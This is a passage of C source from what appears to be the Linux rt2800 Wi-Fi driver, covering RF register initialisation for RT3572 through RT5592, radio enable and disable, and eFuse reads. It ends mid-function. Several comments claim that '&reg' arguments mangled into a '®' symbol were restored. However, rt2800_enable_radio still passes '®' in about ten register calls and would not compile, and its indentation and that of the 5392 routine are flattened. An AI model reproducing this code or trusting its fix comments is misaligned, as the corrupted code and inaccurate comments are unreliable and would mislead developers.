 * rt2800_init_rfcsr_3572 - program RF CSR defaults for RT3572.
 *
 * Triggers RF self-calibration, writes the vendor RF register defaults,
 * pulses the LDO core voltage high briefly before returning it to its
 * normal level, calibrates the RX filters and leaves calibration mode.
 *
 * Fix: restored "&reg" in the LDO_CFG0 register accesses; the source
 * had been mangled into a literal (R) symbol, which does not compile.
 */
static void rt2800_init_rfcsr_3572(struct rt2x00_dev *rt2x00dev)
{
	u8 rfcsr;
	u32 reg;

	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 0, 0x70);
	rt2800_rfcsr_write(rt2x00dev, 1, 0x81);
	rt2800_rfcsr_write(rt2x00dev, 2, 0xf1);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 4, 0x4c);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x05);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x4a);
	rt2800_rfcsr_write(rt2x00dev, 7, 0xd8);
	rt2800_rfcsr_write(rt2x00dev, 9, 0xc3);
	rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
	rt2800_rfcsr_write(rt2x00dev, 11, 0xb9);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x70);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x65);
	rt2800_rfcsr_write(rt2x00dev, 14, 0xa0);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
	rt2800_rfcsr_write(rt2x00dev, 16, 0x4c);
	rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
	rt2800_rfcsr_write(rt2x00dev, 18, 0xac);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x93);
	rt2800_rfcsr_write(rt2x00dev, 20, 0xb3);
	rt2800_rfcsr_write(rt2x00dev, 21, 0xd0);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 23, 0x3c);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x16);
	rt2800_rfcsr_write(rt2x00dev, 25, 0x15);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x9b);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x09);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x10);

	rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR6_R2, 1);
	rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);

	/* Raise the LDO core voltage briefly, then restore it */
	rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
	rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 3);
	rt2x00_set_field32(&reg, LDO_CFG0_BGSEL, 1);
	rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
	msleep(1);
	rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
	rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 0);
	rt2x00_set_field32(&reg, LDO_CFG0_BGSEL, 1);
	rt2800_register_write(rt2x00dev, LDO_CFG0, reg);

	rt2800_rx_filter_calibration(rt2x00dev);
	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
/*
 * rt3593_post_bbp_init - late BBP setup for RT3593.
 *
 * Configures MLD based on the RX chain count, applies post-init BBP
 * register values (with a TX beamforming variant for BBP 163), programs
 * the SNR mapping table and sets ADC/DAC and RX AGC parameters.
 */
static void rt3593_post_bbp_init(struct rt2x00_dev *rt2x00dev)
{
	u8 bbp;
	bool txbf_enabled = false; /* FIXME */

	/* MLD needs at least two RX chains */
	rt2800_bbp_read(rt2x00dev, 105, &bbp);
	if (rt2x00dev->default_ant.rx_chain_num == 1)
		rt2x00_set_field8(&bbp, BBP105_MLD, 0);
	else
		rt2x00_set_field8(&bbp, BBP105_MLD, 1);
	rt2800_bbp_write(rt2x00dev, 105, bbp);

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 92, 0x02);
	rt2800_bbp_write(rt2x00dev, 82, 0x82);
	rt2800_bbp_write(rt2x00dev, 106, 0x05);
	rt2800_bbp_write(rt2x00dev, 104, 0x92);
	rt2800_bbp_write(rt2x00dev, 88, 0x90);
	rt2800_bbp_write(rt2x00dev, 148, 0xc8);
	rt2800_bbp_write(rt2x00dev, 47, 0x48);
	rt2800_bbp_write(rt2x00dev, 120, 0x50);

	if (txbf_enabled)
		rt2800_bbp_write(rt2x00dev, 163, 0xbd);
	else
		rt2800_bbp_write(rt2x00dev, 163, 0x9d);

	/* SNR mapping */
	rt2800_bbp_write(rt2x00dev, 142, 6);
	rt2800_bbp_write(rt2x00dev, 143, 160);
	rt2800_bbp_write(rt2x00dev, 142, 7);
	rt2800_bbp_write(rt2x00dev, 143, 161);
	rt2800_bbp_write(rt2x00dev, 142, 8);
	rt2800_bbp_write(rt2x00dev, 143, 162);

	/* ADC/DAC control */
	rt2800_bbp_write(rt2x00dev, 31, 0x08);

	/* RX AGC energy lower bound in log2 */
	rt2800_bbp_write(rt2x00dev, 68, 0x0b);

	/* FIXME: BBP 105 owerwrite? */
	rt2800_bbp_write(rt2x00dev, 105, 0x04);
}
/*
 * rt2800_init_rfcsr_3593 - program RF CSR defaults for RT3593.
 *
 * Disables the LAN PE control GPIOs, writes the vendor RF register
 * defaults, initiates calibration (RESCAL, frequency offset, XO tune
 * bypass, LDO voltage pulse), seeds the RX filter calibration values
 * and performs the normal-mode plus post-BBP setup.
 *
 * Fix: restored "&reg" in the GPIO_SWITCH/LDO_CFG0 register accesses;
 * the source had been mangled into a literal (R) symbol, which does
 * not compile.
 */
static void rt2800_init_rfcsr_3593(struct rt2x00_dev *rt2x00dev)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u32 reg;
	u8 rfcsr;

	/* Disable GPIO #4 and #7 function for LAN PE control */
	rt2800_register_read(rt2x00dev, GPIO_SWITCH, &reg);
	rt2x00_set_field32(&reg, GPIO_SWITCH_4, 0);
	rt2x00_set_field32(&reg, GPIO_SWITCH_7, 0);
	rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);

	/* Initialize default register values */
	rt2800_rfcsr_write(rt2x00dev, 1, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 6, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 8, 0xf1);
	rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
	rt2800_rfcsr_write(rt2x00dev, 10, 0xd3);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x4e);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x12);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x40);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 32, 0x78);
	rt2800_rfcsr_write(rt2x00dev, 33, 0x3b);
	rt2800_rfcsr_write(rt2x00dev, 34, 0x3c);
	rt2800_rfcsr_write(rt2x00dev, 35, 0xe0);
	rt2800_rfcsr_write(rt2x00dev, 38, 0x86);
	rt2800_rfcsr_write(rt2x00dev, 39, 0x23);
	rt2800_rfcsr_write(rt2x00dev, 44, 0xd3);
	rt2800_rfcsr_write(rt2x00dev, 45, 0xbb);
	rt2800_rfcsr_write(rt2x00dev, 46, 0x60);
	rt2800_rfcsr_write(rt2x00dev, 49, 0x8e);
	rt2800_rfcsr_write(rt2x00dev, 50, 0x86);
	rt2800_rfcsr_write(rt2x00dev, 51, 0x75);
	rt2800_rfcsr_write(rt2x00dev, 52, 0x45);
	rt2800_rfcsr_write(rt2x00dev, 53, 0x18);
	rt2800_rfcsr_write(rt2x00dev, 54, 0x18);
	rt2800_rfcsr_write(rt2x00dev, 55, 0x18);
	rt2800_rfcsr_write(rt2x00dev, 56, 0xdb);
	rt2800_rfcsr_write(rt2x00dev, 57, 0x6e);

	/* Initiate calibration */
	/* TODO: use rt2800_rf_init_calibration ? */
	rt2800_rfcsr_read(rt2x00dev, 2, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR2_RESCAL_EN, 1);
	rt2800_rfcsr_write(rt2x00dev, 2, rfcsr);

	rt2800_adjust_freq_offset(rt2x00dev);

	rt2800_rfcsr_read(rt2x00dev, 18, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR18_XO_TUNE_BYPASS, 1);
	rt2800_rfcsr_write(rt2x00dev, 18, rfcsr);

	/* Pulse the LDO core voltage high, then restore it */
	rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
	rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 3);
	rt2x00_set_field32(&reg, LDO_CFG0_BGSEL, 1);
	rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
	usleep_range(1000, 1500);
	rt2800_register_read(rt2x00dev, LDO_CFG0, &reg);
	rt2x00_set_field32(&reg, LDO_CFG0_LDO_CORE_VLEVEL, 0);
	rt2800_register_write(rt2x00dev, LDO_CFG0, reg);

	/* Set initial values for RX filter calibration */
	drv_data->calibration_bw20 = 0x1f;
	drv_data->calibration_bw40 = 0x2f;

	/* Save BBP 25 & 26 values for later use in channel switching */
	rt2800_bbp_read(rt2x00dev, 25, &drv_data->bbp25);
	rt2800_bbp_read(rt2x00dev, 26, &drv_data->bbp26);

	rt2800_led_open_drain_enable(rt2x00dev);
	rt2800_normal_mode_setup_3593(rt2x00dev);

	rt3593_post_bbp_init(rt2x00dev);

	/* TODO: enable stream mode support */
}
/*
 * rt2800_init_rfcsr_5390 - program the RT5390 RF CSR power-on defaults.
 *
 * Kicks off RF self-calibration, then writes the vendor-specified init
 * value into each RF CSR register in a fixed order.  Several registers
 * (6, 25, 46, 53, 56, 61) take different values on REV_RT5390F (or
 * later) silicon, and some additionally depend on whether the device
 * sits on a USB bus.  Finishes with the common 5xxx normal-mode setup
 * and LED open-drain enable.
 */
static void rt2800_init_rfcsr_5390(struct rt2x00_dev *rt2x00dev)
{
	rt2800_rf_init_calibration(rt2x00dev, 2);

	rt2800_rfcsr_write(rt2x00dev, 1, 0x0f);
	rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x88);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
	/* RFCSR 6: revision-dependent value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
		rt2800_rfcsr_write(rt2x00dev, 6, 0xe0);
	else
		rt2800_rfcsr_write(rt2x00dev, 6, 0xa0);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
	rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
	rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
	rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 21, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
	rt2800_rfcsr_write(rt2x00dev, 23, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 24, 0x00);
	/* RFCSR 25: USB + REV_RT5390F devices use a different value */
	if (rt2x00_is_usb(rt2x00dev) &&
	    rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
		rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
	else
		rt2800_rfcsr_write(rt2x00dev, 25, 0xc0);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
	rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
	rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
	rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
	rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
	rt2800_rfcsr_write(rt2x00dev, 40, 0x0b);
	rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
	rt2800_rfcsr_write(rt2x00dev, 42, 0xd2);
	rt2800_rfcsr_write(rt2x00dev, 43, 0x9a);
	rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
	rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
	/* RFCSR 46: revision-dependent value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
		rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
	else
		rt2800_rfcsr_write(rt2x00dev, 46, 0x7b);
	rt2800_rfcsr_write(rt2x00dev, 47, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 49, 0x94);
	rt2800_rfcsr_write(rt2x00dev, 52, 0x38);
	/* RFCSR 53: revision-dependent value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
		rt2800_rfcsr_write(rt2x00dev, 53, 0x00);
	else
		rt2800_rfcsr_write(rt2x00dev, 53, 0x84);
	rt2800_rfcsr_write(rt2x00dev, 54, 0x78);
	rt2800_rfcsr_write(rt2x00dev, 55, 0x44);
	/* RFCSR 56: revision-dependent value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
		rt2800_rfcsr_write(rt2x00dev, 56, 0x42);
	else
		rt2800_rfcsr_write(rt2x00dev, 56, 0x22);
	rt2800_rfcsr_write(rt2x00dev, 57, 0x80);
	rt2800_rfcsr_write(rt2x00dev, 58, 0x7f);
	rt2800_rfcsr_write(rt2x00dev, 59, 0x8f);
	rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
	/* RFCSR 61: depends on both silicon revision and bus type */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
		if (rt2x00_is_usb(rt2x00dev))
			rt2800_rfcsr_write(rt2x00dev, 61, 0xd1);
		else
			rt2800_rfcsr_write(rt2x00dev, 61, 0xd5);
	} else {
		if (rt2x00_is_usb(rt2x00dev))
			rt2800_rfcsr_write(rt2x00dev, 61, 0xdd);
		else
			rt2800_rfcsr_write(rt2x00dev, 61, 0xb5);
	}
	rt2800_rfcsr_write(rt2x00dev, 62, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 63, 0x00);

	rt2800_normal_mode_setup_5xxx(rt2x00dev);

	rt2800_led_open_drain_enable(rt2x00dev);
}
static void rt2800_init_rfcsr_5392(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 2);
rt2800_rfcsr_write(rt2x00dev, 1, 0x17);
rt2800_rfcsr_write(rt2x00dev, 3, 0x88);
rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
rt2800_rfcsr_write(rt2x00dev, 6, 0xe0);
rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
rt2800_rfcsr_write(rt2x00dev, 19, 0x4d);
rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
rt2800_rfcsr_write(rt2x00dev, 21, 0x8d);
rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
rt2800_rfcsr_write(rt2x00dev, 23, 0x0b);
rt2800_rfcsr_write(rt2x00dev, 24, 0x44);
rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x20);
rt2800_rfcsr_write(rt2x00dev, 33, 0xC0);
rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
rt2800_rfcsr_write(rt2x00dev, 38, 0x89);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 40, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
rt2800_rfcsr_write(rt2x00dev, 42, 0xd5);
rt2800_rfcsr_write(rt2x00dev, 43, 0x9b);
rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
rt2800_rfcsr_write(rt2x00dev, 47, 0x0c);
rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
rt2800_rfcsr_write(rt2x00dev, 49, 0x94);
rt2800_rfcsr_write(rt2x00dev, 50, 0x94);
rt2800_rfcsr_write(rt2x00dev, 51, 0x3a);
rt2800_rfcsr_write(rt2x00dev, 52, 0x48);
rt2800_rfcsr_write(rt2x00dev, 53, 0x44);
rt2800_rfcsr_write(rt2x00dev, 54, 0x38);
rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
rt2800_rfcsr_write(rt2x00dev, 56, 0xa1);
rt2800_rfcsr_write(rt2x00dev, 57, 0x00);
rt2800_rfcsr_write(rt2x00dev, 58, 0x39);
rt2800_rfcsr_write(rt2x00dev, 59, 0x07);
rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
rt2800_rfcsr_write(rt2x00dev, 61, 0x91);
rt2800_rfcsr_write(rt2x00dev, 62, 0x39);
rt2800_rfcsr_write(rt2x00dev, 63, 0x07);
rt2800_normal_mode_setup_5xxx(rt2x00dev);
rt2800_led_open_drain_enable(rt2x00dev);
}
/*
 * rt2800_init_rfcsr_5592 - program the RT5592 RF CSR power-on defaults.
 *
 * Kicks off RF self-calibration and writes the vendor-specified init
 * values, then triggers resistor calibration via RFCSR 2 and adjusts
 * the crystal frequency offset.  RT5592C (and later) silicon enables
 * the BBP DC filter; pre-RT5592C parts need an extra RFCSR 27 write.
 */
static void rt2800_init_rfcsr_5592(struct rt2x00_dev *rt2x00dev)
{
	rt2800_rf_init_calibration(rt2x00dev, 30);

	rt2800_rfcsr_write(rt2x00dev, 1, 0x3F);
	rt2800_rfcsr_write(rt2x00dev, 3, 0x08);
	rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 6, 0xE4);
	rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
	rt2800_rfcsr_write(rt2x00dev, 19, 0x4D);
	rt2800_rfcsr_write(rt2x00dev, 20, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 21, 0x8D);
	rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
	rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
	rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
	rt2800_rfcsr_write(rt2x00dev, 33, 0xC0);
	rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
	rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
	rt2800_rfcsr_write(rt2x00dev, 47, 0x0C);
	rt2800_rfcsr_write(rt2x00dev, 53, 0x22);
	rt2800_rfcsr_write(rt2x00dev, 63, 0x07);

	/* Trigger calibration, then give the RF time to settle */
	rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
	msleep(1);

	rt2800_adjust_freq_offset(rt2x00dev);

	/* Enable DC filter */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C))
		rt2800_bbp_write(rt2x00dev, 103, 0xc0);

	rt2800_normal_mode_setup_5xxx(rt2x00dev);

	if (rt2x00_rt_rev_lt(rt2x00dev, RT5592, REV_RT5592C))
		rt2800_rfcsr_write(rt2x00dev, 27, 0x03);

	rt2800_led_open_drain_enable(rt2x00dev);
}
/*
 * rt2800_init_rfcsr - dispatch RF CSR initialization per chipset.
 *
 * 305x SoC devices get their own init path; everything else is selected
 * by the RT chipset id.  Chipsets not listed here (e.g. RT2860/RT2872,
 * which have no software-programmable RF CSRs in this path) intentionally
 * fall through without any RF CSR programming.
 */
static void rt2800_init_rfcsr(struct rt2x00_dev *rt2x00dev)
{
	if (rt2800_is_305x_soc(rt2x00dev)) {
		rt2800_init_rfcsr_305x_soc(rt2x00dev);
		return;
	}

	switch (rt2x00dev->chip.rt) {
	case RT3070:
	case RT3071:
	case RT3090:
		rt2800_init_rfcsr_30xx(rt2x00dev);
		break;
	case RT3290:
		rt2800_init_rfcsr_3290(rt2x00dev);
		break;
	case RT3352:
		rt2800_init_rfcsr_3352(rt2x00dev);
		break;
	case RT3390:
		rt2800_init_rfcsr_3390(rt2x00dev);
		break;
	case RT3572:
		rt2800_init_rfcsr_3572(rt2x00dev);
		break;
	case RT3593:
		rt2800_init_rfcsr_3593(rt2x00dev);
		break;
	case RT5390:
		rt2800_init_rfcsr_5390(rt2x00dev);
		break;
	case RT5392:
		rt2800_init_rfcsr_5392(rt2x00dev);
		break;
	case RT5592:
		rt2800_init_rfcsr_5592(rt2x00dev);
		break;
	}
}
int rt2800_enable_radio(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 word;
/*
* Initialize MAC registers.
*/
if (unlikely(rt2800_wait_wpdma_ready(rt2x00dev) ||
rt2800_init_registers(rt2x00dev)))
return -EIO;
/*
* Wait BBP/RF to wake up.
*/
if (unlikely(rt2800_wait_bbp_rf_ready(rt2x00dev)))
return -EIO;
/*
* Send signal during boot time to initialize firmware.
*/
rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
if (rt2x00_is_usb(rt2x00dev))
rt2800_register_write(rt2x00dev, H2M_INT_SRC, 0);
rt2800_mcu_request(rt2x00dev, MCU_BOOT_SIGNAL, 0, 0, 0);
msleep(1);
/*
* Make sure BBP is up and running.
*/
if (unlikely(rt2800_wait_bbp_ready(rt2x00dev)))
return -EIO;
/*
* Initialize BBP/RF registers.
*/
rt2800_init_bbp(rt2x00dev);
rt2800_init_rfcsr(rt2x00dev);
if (rt2x00_is_usb(rt2x00dev) &&
(rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3572))) {
udelay(200);
rt2800_mcu_request(rt2x00dev, MCU_CURRENT, 0, 0, 0);
udelay(10);
}
/*
* Enable RX.
*/
rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, ®);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_TX, 1);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_RX, 0);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
udelay(50);
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_TX_DMA, 1);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_RX_DMA, 1);
rt2x00_set_field32(®, WPDMA_GLO_CFG_WP_DMA_BURST_SIZE, 2);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 1);
rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, ®);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_TX, 1);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_RX, 1);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
/*
* Initialize LED control
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_AG_CONF, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_AG_CONF, 0xff,
word & 0xff, (word >> 8) & 0xff);
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_ACT_CONF, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_ACT_CONF, 0xff,
word & 0xff, (word >> 8) & 0xff);
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_POLARITY, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_LED_POLARITY, 0xff,
word & 0xff, (word >> 8) & 0xff);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_enable_radio);
/*
 * rt2800_disable_radio - shut the radio down.
 *
 * Disables WPDMA, waits for in-flight DMA to drain (the wait result is
 * deliberately ignored - we are tearing down anyway), then clears the
 * MAC TX and RX enable bits.
 *
 * Fix: restored the '&reg' address-of expressions that had been mangled
 * into '®' by a broken text conversion.
 */
void rt2800_disable_radio(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;

	rt2800_disable_wpdma(rt2x00dev);

	/* Wait for DMA, ignore error */
	rt2800_wait_wpdma_ready(rt2x00dev);

	rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, &reg);
	rt2x00_set_field32(&reg, MAC_SYS_CTRL_ENABLE_TX, 0);
	rt2x00_set_field32(&reg, MAC_SYS_CTRL_ENABLE_RX, 0);
	rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
}
EXPORT_SYMBOL_GPL(rt2800_disable_radio);
/*
 * rt2800_efuse_detect - check whether the chip carries an eFuse EEPROM.
 *
 * Reads the eFuse control register (RT3290 uses a different register
 * offset) and returns the EFUSE_CTRL_PRESENT field: non-zero when an
 * eFuse is present.
 *
 * Fix: restored the '&reg' address-of expression that had been mangled
 * into '®' by a broken text conversion.
 */
int rt2800_efuse_detect(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;
	u16 efuse_ctrl_reg;

	if (rt2x00_rt(rt2x00dev, RT3290))
		efuse_ctrl_reg = EFUSE_CTRL_3290;
	else
		efuse_ctrl_reg = EFUSE_CTRL;

	rt2800_register_read(rt2x00dev, efuse_ctrl_reg, &reg);
	return rt2x00_get_field32(reg, EFUSE_CTRL_PRESENT);
}
EXPORT_SYMBOL_GPL(rt2800_efuse_detect);
/*
 * rt2800_efuse_read - read one 8-word (16-byte) eFuse block into the
 * eeprom cache starting at word index @i.
 *
 * Kicks an eFuse read via the control register, busy-waits for the kick
 * bit to clear, then copies the four 32-bit data registers into
 * rt2x00dev->eeprom.  RT3290 uses a different register layout.  The
 * whole transaction is serialized with csr_mutex.
 *
 * Fix: restored the '&reg' address-of expressions that had been mangled
 * into '®' by a broken text conversion.
 */
static void rt2800_efuse_read(struct rt2x00_dev *rt2x00dev, unsigned int i)
{
	u32 reg;
	u16 efuse_ctrl_reg;
	u16 efuse_data0_reg;
	u16 efuse_data1_reg;
	u16 efuse_data2_reg;
	u16 efuse_data3_reg;

	if (rt2x00_rt(rt2x00dev, RT3290)) {
		efuse_ctrl_reg = EFUSE_CTRL_3290;
		efuse_data0_reg = EFUSE_DATA0_3290;
		efuse_data1_reg = EFUSE_DATA1_3290;
		efuse_data2_reg = EFUSE_DATA2_3290;
		efuse_data3_reg = EFUSE_DATA3_3290;
	} else {
		efuse_ctrl_reg = EFUSE_CTRL;
		efuse_data0_reg = EFUSE_DATA0;
		efuse_data1_reg = EFUSE_DATA1;
		efuse_data2_reg = EFUSE_DATA2;
		efuse_data3_reg = EFUSE_DATA3;
	}
	mutex_lock(&rt2x00dev->csr_mutex);

	rt2800_register_read_lock(rt2x00dev, efuse_ctrl_reg, &reg);
	rt2x00_set_field32(&reg, EFUSE_CTRL_ADDRESS_IN, i);
	rt2x00_set_field32(&reg, EFUSE_CTRL_MODE, 0);
	rt2x00_set_field32(&reg, EFUSE_CTRL_KICK, 1);
	rt2800_register_write_lock(rt2x00dev, efuse_ctrl_reg, reg);

	/* Wait until the EEPROM has been loaded */
	rt2800_regbusy_read(rt2x00dev, efuse_ctrl_reg, EFUSE_CTRL_KICK, &reg);
	/* Apparently the data is read from end to start */
	rt2800_register_read_lock(rt2x00dev, efuse_data3_reg, &reg);
	/* The returned value is in CPU order, but eeprom is le */
